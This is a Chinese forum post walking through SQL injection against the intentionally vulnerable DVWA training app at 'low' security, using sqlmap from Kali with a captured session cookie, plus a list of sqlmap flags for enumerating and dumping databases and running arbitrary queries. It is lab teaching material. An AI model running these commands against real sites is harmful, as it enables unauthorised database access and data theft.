Sqlmap注入dvwa平台low级别

立山  论坛元老 | 2022-8-31 05:44:25 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题

主题 1006|帖子 1006|积分 3018

工具介绍:sqlmap是一款开源的软件SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。SQL注入攻击属于数据库安全攻击手段之一,可以通过数据库安全防护技术实现有效防护,数据库安全防护技术包括:数据库漏扫、数据库加密数据库防火墙数据脱敏数据库安全审计系统。SQL注入攻击会导致的数据库安全风险包括:刷库拖库撞库。low级别注入:使用kali 自带的 sqlmap  
搭建dvwa环境  
把安全级别改为low级别  
 
SQLInjection(注射:注入) user id 22   
 
查看网站cookie 浏览器按F12 或者右键检查找到网络选项 英文network : 
 CTRL + R 刷新记录可以看见cookie:

 
 
 
复制到kali 使用sqlmap工具执行命令sqlmap -u "http://192.168.62.136/DVWA/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie 'PHPSESSID=o2md9cm1d24jbrpbdj1ra02os8; security=low' --current-user ##-u 接网站URL  --cookie使用cookie认证  --current-user # 查询当前数据库用户

 
 
 
 注入成功  
 
查看基本信息
1. --users # 查询所有的数据库账号
2. --dbs # 查询所有数据库
3. --schema # 查询源数据库(包含定义数据的数据)
4. -a # 查询当前user、当前数据库、主机名、当前user是否是最大权限管理员、数据库账号等
5. -D dvwa# 指定数据库
6. --current-user # 查询当前数据库用户
7. --current-db # 查询当前数据库
8. --hostname # 查看服务器的主机名
9. --Privileges -U username # 查询username的权限
10. --roles 角色
11. --tables # 查看所有的表
12. -T # 指定表
13. --columns # 查看所有的字段
14. -C # 指定字段
15. --count # 计数,查看有多少条数据
16. --exclude-sysdbs # 排除系统库
17. --dump # 查看数据
18. --start 3 # 查看第三条
19. --end 4 # 查看第四条
20. --sql-query "select * from users" # 执行语句

21. --common-columns # 暴力破解字段,应用于两种情况:①无权限读取数据。②mysql

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

立山

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表